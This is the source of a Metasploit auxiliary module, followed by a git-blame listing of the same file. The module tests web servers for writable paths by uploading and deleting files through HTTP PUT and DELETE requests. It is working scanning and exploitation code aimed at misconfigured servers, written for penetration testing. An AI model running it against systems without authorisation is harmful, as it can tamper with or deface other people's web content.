metasploit-framework/modules/auxiliary/scanner/http/http_put.rb

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##

require 'msf/core'

class Metasploit4 < Msf::Auxiliary

	include Msf::Exploit::Remote::HttpClient
	include Msf::Auxiliary::Scanner
	include Msf::Auxiliary::Report

	def initialize
		super(
			'Name'        => 'HTTP Writable Path PUT/DELETE File Access',
			'Version'     => '$Revision$',
			'Description'    => %q{
				This module can abuse misconfigured web servers to upload and delete web content
				via PUT and DELETE HTTP requests. Set ACTION to either PUT or DELETE.

				PUT is the default.  If filename isn't specified, the module will generate a
				random string for you as a .txt file. If DELETE is used, a filename is required.
			},
			'Author'      =>
				[
					'Kashif [at] compulife.com.pk',
					'CG',
					'sinn3r',
				],
			'License'     => MSF_LICENSE,
			'References'  =>
			[
				[ 'OSVDB', '397'],
			],
			'Actions'     =>
				[
					['PUT'],
					['DELETE']
				],
			'DefaultAction' => 'PUT'
		)

		register_options(
			[
				OptString.new('PATH', [true,  "The path to attempt to write or delete", "/msf_http_put_test.txt"]),
				OptString.new('DATA', [false, "The data to upload into the file", "msf test file"]),
				OptString.new('ACTION', [true, "PUT or DELETE", "PUT"])
			], self.class)
	end

	#
	# Send a normal HTTP request and see if we successfully uploaded or deleted a file.
	# If successful, return true, otherwise false.
	#
	def file_exists(path, data)
		begin
			res = send_request_cgi(
				{
					'uri'    => path,
					'method' => 'GET',
					'ctype'  => 'text/plain',
					'data'   => data,
				}, 20
			).to_s
		rescue ::Exception => e
			print_error("Error: #{e.to_s}")
			return nil
		end

		return (res =~ /#{data}/) ? true : false
	end

	#
	# Do a PUT request to the server.  Function returns the HTTP response.
	#
	def do_put(path, data)
		begin
			res = send_request_cgi(
				{
					'uri'    => path,
					'method' => 'PUT',
					'ctype'  => 'text/plain',
					'data'   => data,
				}, 20
			)
		rescue ::Exception => e
			print_error("Error: #{e.to_s}")
			return nil
		end

		return res
	end

	#
	# Do a DELETE request. Function returns the HTTP response.
	#
	def do_delete(path)
		begin
			res = send_request_cgi(
				{
					'uri'    => path,
					'method' => 'DELETE',
					'ctype'  => 'text/html',
				}, 20
			)
		rescue ::Exception => e
			print_error("Error: #{e.to_s}")
			return nil
		end

		return res
	end

	#
	# Main function for the module, duh!
	#
	def run_host(ip)
		path   = datastore['PATH']
		data   = datastore['DATA']

		#Add "/" if necessary
		path = "/#{path}" if path[0,1] != '/'

		case action.name
		when 'PUT'
			#Append filename if there isn't one
			if path !~ /(.+\.\w+)$/
				path << "#{Rex::Text.rand_text_alpha(5)}.txt"
				vprint_status("No filename specified. Using: #{path}")
			end

			#Upload file
			res = do_put(path, data)
			vprint_status("Reply: #{res.code.to_s}")

			#Check file
			if not res.nil? and file_exists(path, data)
				print_good("File uploaded: #{ip}:#{rport}#{path}")
				report_vuln(
					:host         => ip,
					:port         => rport,
					:proto        => 'tcp',
					:name         => self.fullname,
					:info         => "PUT Enabled",
					:refs         => self.references,
					:exploited_at => Time.now.utc
				)
			else
				print_error("File doesn't seem to exist. The upload probably failed.")
			end

		when 'DELETE'
			#Check file before deleting
			if path !~ /(.+\.\w+)$/
				print_error("You must supply a filename")
				return
			elsif not file_exists(path, data)
				print_error("File is already gone. Will not continue DELETE")
				return
			end

			#Delete our file
			res = do_delete(path)
			vprint_status("Reply: #{res.code.to_s}")

			#Check if DELETE was successful
			if res.nil? or file_exists(path, data)
				print_error("DELETE failed. File is still there.")
			else
				print_good("File deleted: #{ip}:#{rport}#{path}")
				report_vuln(
					:host         => ip,
					:port         => rport,
					:proto        => 'tcp',
					:sname        => (ssl ? "https" : "http"),
					:name         => self.fullname,
					:info         => "DELETE ENABLED",
					:refs         => self.references,
					:exploited_at => Time.now.utc
				)
			end
		end
	end

end
Checking response codes is a terrible way for HTTP modules. #5470. git-svn-id: file:///home/svn/framework3/trunk@13759 4d416f70-5f16-0410-b530-b9f4589650da 2011-09-19 20:36:09 +00:00			`##`
			`# $Id$`
			`##`

Add a module to check HTTP PUT / DELETE file access. Thanks CG! Resolves 5089. git-svn-id: file:///home/svn/framework3/trunk@13755 4d416f70-5f16-0410-b530-b9f4589650da 2011-09-19 01:18:23 +00:00			`##`
			`# This file is part of the Metasploit Framework and may be subject to`
			`# redistribution and commercial restrictions. Please see the Metasploit`
Fix up the boilerplate comment to use a better url 2012-02-21 01:40:50 +00:00			`# web site for more information on licensing and terms of use.`
			`# http://metasploit.com/`
Add a module to check HTTP PUT / DELETE file access. Thanks CG! Resolves 5089. git-svn-id: file:///home/svn/framework3/trunk@13755 4d416f70-5f16-0410-b530-b9f4589650da 2011-09-19 01:18:23 +00:00			`##`

			`require 'msf/core'`

			`class Metasploit4 < Msf::Auxiliary`

			`include Msf::Exploit::Remote::HttpClient`
			`include Msf::Auxiliary::Scanner`
			`include Msf::Auxiliary::Report`

			`def initialize`
			`super(`
			`'Name' => 'HTTP Writable Path PUT/DELETE File Access',`
			`'Version' => '$Revision$',`
			`'Description' => %q{`
Checking response codes is a terrible way for HTTP modules. #5470. git-svn-id: file:///home/svn/framework3/trunk@13759 4d416f70-5f16-0410-b530-b9f4589650da 2011-09-19 20:36:09 +00:00			`This module can abuse misconfigured web servers to upload and delete web content`
			`via PUT and DELETE HTTP requests. Set ACTION to either PUT or DELETE.`

			`PUT is the default. If filename isn't specified, the module will generate a`
			`random string for you as a .txt file. If DELETE is used, a filename is required.`
Add a module to check HTTP PUT / DELETE file access. Thanks CG! Resolves 5089. git-svn-id: file:///home/svn/framework3/trunk@13755 4d416f70-5f16-0410-b530-b9f4589650da 2011-09-19 01:18:23 +00:00			`},`
			`'Author' =>`
			`[`
Checking response codes is a terrible way for HTTP modules. #5470. git-svn-id: file:///home/svn/framework3/trunk@13759 4d416f70-5f16-0410-b530-b9f4589650da 2011-09-19 20:36:09 +00:00			`'Kashif [at] compulife.com.pk',`
			`'CG',`
			`'sinn3r',`
Add a module to check HTTP PUT / DELETE file access. Thanks CG! Resolves 5089. git-svn-id: file:///home/svn/framework3/trunk@13755 4d416f70-5f16-0410-b530-b9f4589650da 2011-09-19 01:18:23 +00:00			`],`
			`'License' => MSF_LICENSE,`
Msftidy run against a bunch of whitespace violations, a few line too longs. git-svn-id: file:///home/svn/framework3/trunk@13962 4d416f70-5f16-0410-b530-b9f4589650da 2011-10-17 02:42:01 +00:00			`'References' =>`
Add a module to check HTTP PUT / DELETE file access. Thanks CG! Resolves 5089. git-svn-id: file:///home/svn/framework3/trunk@13755 4d416f70-5f16-0410-b530-b9f4589650da 2011-09-19 01:18:23 +00:00			`[`
			`[ 'OSVDB', '397'],`
Checking response codes is a terrible way for HTTP modules. #5470. git-svn-id: file:///home/svn/framework3/trunk@13759 4d416f70-5f16-0410-b530-b9f4589650da 2011-09-19 20:36:09 +00:00			`],`
Add a module to check HTTP PUT / DELETE file access. Thanks CG! Resolves 5089. git-svn-id: file:///home/svn/framework3/trunk@13755 4d416f70-5f16-0410-b530-b9f4589650da 2011-09-19 01:18:23 +00:00			`'Actions' =>`
			`[`
			`['PUT'],`
			`['DELETE']`
			`],`
Checking response codes is a terrible way for HTTP modules. #5470. git-svn-id: file:///home/svn/framework3/trunk@13759 4d416f70-5f16-0410-b530-b9f4589650da 2011-09-19 20:36:09 +00:00			`'DefaultAction' => 'PUT'`
Add a module to check HTTP PUT / DELETE file access. Thanks CG! Resolves 5089. git-svn-id: file:///home/svn/framework3/trunk@13755 4d416f70-5f16-0410-b530-b9f4589650da 2011-09-19 01:18:23 +00:00			`)`

			`register_options(`
			`[`
Checking response codes is a terrible way for HTTP modules. #5470. git-svn-id: file:///home/svn/framework3/trunk@13759 4d416f70-5f16-0410-b530-b9f4589650da 2011-09-19 20:36:09 +00:00			`OptString.new('PATH', [true, "The path to attempt to write or delete", "/msf_http_put_test.txt"]),`
			`OptString.new('DATA', [false, "The data to upload into the file", "msf test file"]),`
			`OptString.new('ACTION', [true, "PUT or DELETE", "PUT"])`
Add a module to check HTTP PUT / DELETE file access. Thanks CG! Resolves 5089. git-svn-id: file:///home/svn/framework3/trunk@13755 4d416f70-5f16-0410-b530-b9f4589650da 2011-09-19 01:18:23 +00:00			`], self.class)`
			`end`

Checking response codes is a terrible way for HTTP modules. #5470. git-svn-id: file:///home/svn/framework3/trunk@13759 4d416f70-5f16-0410-b530-b9f4589650da 2011-09-19 20:36:09 +00:00			`#`
Apparently I can't speaks engrish git-svn-id: file:///home/svn/framework3/trunk@13760 4d416f70-5f16-0410-b530-b9f4589650da 2011-09-19 21:18:48 +00:00			`# Send a normal HTTP request and see if we successfully uploaded or deleted a file.`
Checking response codes is a terrible way for HTTP modules. #5470. git-svn-id: file:///home/svn/framework3/trunk@13759 4d416f70-5f16-0410-b530-b9f4589650da 2011-09-19 20:36:09 +00:00			`# If successful, return true, otherwise false.`
			`#`
			`def file_exists(path, data)`
			`begin`
			`res = send_request_cgi(`
			`{`
			`'uri' => path,`
			`'method' => 'GET',`
			`'ctype' => 'text/plain',`
			`'data' => data,`
			`}, 20`
			`).to_s`
			`rescue ::Exception => e`
			`print_error("Error: #{e.to_s}")`
			`return nil`
			`end`

			`return (res =~ /#{data}/) ? true : false`
			`end`

			`#`
			`# Do a PUT request to the server. Function returns the HTTP response.`
			`#`
			`def do_put(path, data)`
			`begin`
			`res = send_request_cgi(`
			`{`
			`'uri' => path,`
			`'method' => 'PUT',`
			`'ctype' => 'text/plain',`
			`'data' => data,`
			`}, 20`
			`)`
			`rescue ::Exception => e`
			`print_error("Error: #{e.to_s}")`
			`return nil`
			`end`

			`return res`
			`end`

			`#`
			`# Do a DELETE request. Function returns the HTTP response.`
			`#`
			`def do_delete(path)`
			`begin`
			`res = send_request_cgi(`
			`{`
			`'uri' => path,`
			`'method' => 'DELETE',`
			`'ctype' => 'text/html',`
			`}, 20`
			`)`
			`rescue ::Exception => e`
			`print_error("Error: #{e.to_s}")`
			`return nil`
			`end`

			`return res`
			`end`

			`#`
			`# Main function for the module, duh!`
			`#`
Add a module to check HTTP PUT / DELETE file access. Thanks CG! Resolves 5089. git-svn-id: file:///home/svn/framework3/trunk@13755 4d416f70-5f16-0410-b530-b9f4589650da 2011-09-19 01:18:23 +00:00			`def run_host(ip)`
Checking response codes is a terrible way for HTTP modules. #5470. git-svn-id: file:///home/svn/framework3/trunk@13759 4d416f70-5f16-0410-b530-b9f4589650da 2011-09-19 20:36:09 +00:00			`path = datastore['PATH']`
			`data = datastore['DATA']`
Add a module to check HTTP PUT / DELETE file access. Thanks CG! Resolves 5089. git-svn-id: file:///home/svn/framework3/trunk@13755 4d416f70-5f16-0410-b530-b9f4589650da 2011-09-19 01:18:23 +00:00
Checking response codes is a terrible way for HTTP modules. #5470. git-svn-id: file:///home/svn/framework3/trunk@13759 4d416f70-5f16-0410-b530-b9f4589650da 2011-09-19 20:36:09 +00:00			`#Add "/" if necessary`
			`path = "/#{path}" if path[0,1] != '/'`
Add a module to check HTTP PUT / DELETE file access. Thanks CG! Resolves 5089. git-svn-id: file:///home/svn/framework3/trunk@13755 4d416f70-5f16-0410-b530-b9f4589650da 2011-09-19 01:18:23 +00:00
			`case action.name`
			`when 'PUT'`
Checking response codes is a terrible way for HTTP modules. #5470. git-svn-id: file:///home/svn/framework3/trunk@13759 4d416f70-5f16-0410-b530-b9f4589650da 2011-09-19 20:36:09 +00:00			`#Append filename if there isn't one`
			`if path !~ /(.+\.\w+)$/`
			`path << "#{Rex::Text.rand_text_alpha(5)}.txt"`
			`vprint_status("No filename specified. Using: #{path}")`
			`end`
msftidy on aux modules, see #5749 2011-11-20 02:12:07 +00:00
Checking response codes is a terrible way for HTTP modules. #5470. git-svn-id: file:///home/svn/framework3/trunk@13759 4d416f70-5f16-0410-b530-b9f4589650da 2011-09-19 20:36:09 +00:00			`#Upload file`
			`res = do_put(path, data)`
			`vprint_status("Reply: #{res.code.to_s}")`

			`#Check file`
			`if not res.nil? and file_exists(path, data)`
			`print_good("File uploaded: #{ip}:#{rport}#{path}")`
			`report_vuln(`
			`:host => ip,`
			`:port => rport,`
			`:proto => 'tcp',`
			`:name => self.fullname,`
			`:info => "PUT Enabled",`
			`:refs => self.references,`
remove silly comma git-svn-id: file:///home/svn/framework3/trunk@13762 4d416f70-5f16-0410-b530-b9f4589650da 2011-09-19 23:06:35 +00:00			`:exploited_at => Time.now.utc`
Checking response codes is a terrible way for HTTP modules. #5470. git-svn-id: file:///home/svn/framework3/trunk@13759 4d416f70-5f16-0410-b530-b9f4589650da 2011-09-19 20:36:09 +00:00			`)`
			`else`
			`print_error("File doesn't seem to exist. The upload probably failed.")`
Add a module to check HTTP PUT / DELETE file access. Thanks CG! Resolves 5089. git-svn-id: file:///home/svn/framework3/trunk@13755 4d416f70-5f16-0410-b530-b9f4589650da 2011-09-19 01:18:23 +00:00			`end`

			`when 'DELETE'`
Checking response codes is a terrible way for HTTP modules. #5470. git-svn-id: file:///home/svn/framework3/trunk@13759 4d416f70-5f16-0410-b530-b9f4589650da 2011-09-19 20:36:09 +00:00			`#Check file before deleting`
			`if path !~ /(.+\.\w+)$/`
			`print_error("You must supply a filename")`
			`return`
			`elsif not file_exists(path, data)`
			`print_error("File is already gone. Will not continue DELETE")`
			`return`
			`end`

			`#Delete our file`
			`res = do_delete(path)`
Printing res code for DELETE should be optional. It's not like we can always trust it anyway. git-svn-id: file:///home/svn/framework3/trunk@13763 4d416f70-5f16-0410-b530-b9f4589650da 2011-09-20 00:41:42 +00:00			`vprint_status("Reply: #{res.code.to_s}")`
Checking response codes is a terrible way for HTTP modules. #5470. git-svn-id: file:///home/svn/framework3/trunk@13759 4d416f70-5f16-0410-b530-b9f4589650da 2011-09-19 20:36:09 +00:00
			`#Check if DELETE was successful`
			`if res.nil? or file_exists(path, data)`
			`print_error("DELETE failed. File is still there.")`
			`else`
			`print_good("File deleted: #{ip}:#{rport}#{path}")`
			`report_vuln(`
			`:host => ip,`
			`:port => rport,`
			`:proto => 'tcp',`
Normalize service names Downcases lots and standardizes a few. Notably, modules that reported a service name of "TNS" are now "oracle". Modules that report http now check for SSL and report https instead. [Fixes #6437] 2012-02-22 05:57:55 +00:00			`:sname => (ssl ? "https" : "http"),`
Checking response codes is a terrible way for HTTP modules. #5470. git-svn-id: file:///home/svn/framework3/trunk@13759 4d416f70-5f16-0410-b530-b9f4589650da 2011-09-19 20:36:09 +00:00			`:name => self.fullname,`
			`:info => "DELETE ENABLED",`
			`:refs => self.references,`
			`:exploited_at => Time.now.utc`
			`)`
Add a module to check HTTP PUT / DELETE file access. Thanks CG! Resolves 5089. git-svn-id: file:///home/svn/framework3/trunk@13755 4d416f70-5f16-0410-b530-b9f4589650da 2011-09-19 01:18:23 +00:00			`end`
			`end`
			`end`
Checking response codes is a terrible way for HTTP modules. #5470. git-svn-id: file:///home/svn/framework3/trunk@13759 4d416f70-5f16-0410-b530-b9f4589650da 2011-09-19 20:36:09 +00:00
Add a module to check HTTP PUT / DELETE file access. Thanks CG! Resolves 5089. git-svn-id: file:///home/svn/framework3/trunk@13755 4d416f70-5f16-0410-b530-b9f4589650da 2011-09-19 01:18:23 +00:00			`end`